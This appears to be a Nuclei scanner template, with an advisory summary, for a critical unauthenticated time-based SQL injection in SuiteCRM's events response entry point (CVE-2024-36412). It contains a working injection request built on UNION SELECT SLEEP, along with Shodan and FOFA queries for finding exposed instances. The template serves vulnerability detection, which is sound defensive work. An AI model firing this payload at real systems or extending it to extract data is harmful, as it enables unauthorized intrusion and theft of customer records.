SuiteCRM is an open-source Customer Relationship Management (CRM) software application. Prior to versions 7.14.4 and 8.6.1, a vulnerability in events response entry point allows for a SQL injection attack. Versions 7.14.4 and 8.6.1 contain a fix for this issue.
PoC代码[已公开]
id: CVE-2024-36412
info:
name: SuiteCRM - SQL Injection
author: s4e-io
severity: critical
description: |
SuiteCRM is an open-source Customer Relationship Management (CRM) software application. Prior to versions 7.14.4 and 8.6.1, a vulnerability in events response entry point allows for a SQL injection attack. Versions 7.14.4 and 8.6.1 contain a fix for this issue.
impact: |
Unauthenticated attackers can execute time-based SQL injection to extract sensitive CRM data.
remediation: |
Update SuiteCRM to version 7.14.4 or 8.6.1 or later.
reference:
- https://0x5001.com/web-security/cve-2024-36412-proof-of-concept
- https://nvd.nist.gov/vuln/detail/CVE-2024-36412
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-36412
cwe-id: CWE-89
epss-score: 0.93636
epss-percentile: 0.9983
cpe: cpe:2.3:a:salesagility:suitecrm:*:*:*:*:*:*:*:*
metadata:
max-request: 1
verified: true
vendor: salesagility
product: suitecrm
shodan-query: title:"SuiteCRM"
fofa-query: title="SuiteCRM"
tags: time-based-sqli,cve,cve2024,suitecrm,sqli,vuln
http:
- raw:
- |
@timeout: 15s
GET /index.php?entryPoint=responseEntryPoint&event=1&delegate=a<"+UNION+SELECT+SLEEP(6);--+-&type=c&response=accept HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "duration>=6"
- "status_code == 200"
- 'contains_any(body, "You have already responded to the invitation or there", "Thank you for accepting")'
condition: and
# digest: 490a00463044022028ce845684d8ddbf248b721c81c251a479c2527da952aa28ba77bba43c5c0d23022007e05ad0d4504b89b88a747646cb992c82ea893f3307ed5da7b712a1119d8ab3:922c64590222798bb761d5b6d8e72950